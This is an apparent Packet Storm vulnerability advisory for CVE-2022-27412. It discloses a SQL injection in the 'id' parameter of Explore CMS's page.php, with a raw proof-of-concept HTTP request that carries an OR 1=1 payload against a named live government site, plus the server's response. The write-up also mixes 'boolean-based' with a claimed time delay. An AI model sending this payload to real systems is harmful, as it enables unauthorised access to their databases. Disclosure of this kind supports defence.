Headline
CVE-2022-27412: Explore CMS 1.0 SQL Injection ≈ Packet Storm
Explore CMS v1.0 was discovered to contain a SQL injection vulnerability via a /page.php?id= request.
# Exploit Title: explore CMS - Boolean Based SQL Injection# Date: 19/03/2022# Exploit Author: Sajibe Kanti# Vendor Name : EXPLORE IT# Vendor Homepage: https://exploreit.com.bd# CVE: On Request# POC#SQL InjectionSQL injection is a web security vulnerability that allows an attackerto interfere with the queries that an application makes to itsdatabase.explore CMS is vulnerable to the SQL Injection in 'id' parameter ofthe 'page' page.#Steps to reproduceFollowing URL is vulnerable to SQL Injection in the 'id' field.GET /page.php?id=1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns HTTP/1.1Host: www.gdc.gov.bdAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheCookie: PHPSESSID=b4c39f2ff3b9470f39bc088ab9ba9320Referer: https://www.gdc.gov.bd/User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36HTTP/1.1 200 OKcontent-encoding:server: LiteSpeedConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/html; charset=UTF-8transfer-encoding: chunkeddate: Thu, 17 Mar 2022 07:27:21 GMTvary: Accept-Encoding10.3.34-MariaDBServer accepts the payload and the response get delayed by 7 seconds.#ImpactAn attcker can compromise the database of the application by manualmethod or by automated tools such as SQLmap.-- ThanksSajibe Kanti
Related news
CVE-2022-27412: Explore CMS 1.0 SQL Injection ≈ Packet Storm
Explore CMS v1.0 was discovered to contain a SQL injection vulnerability via a /page.php?id= request.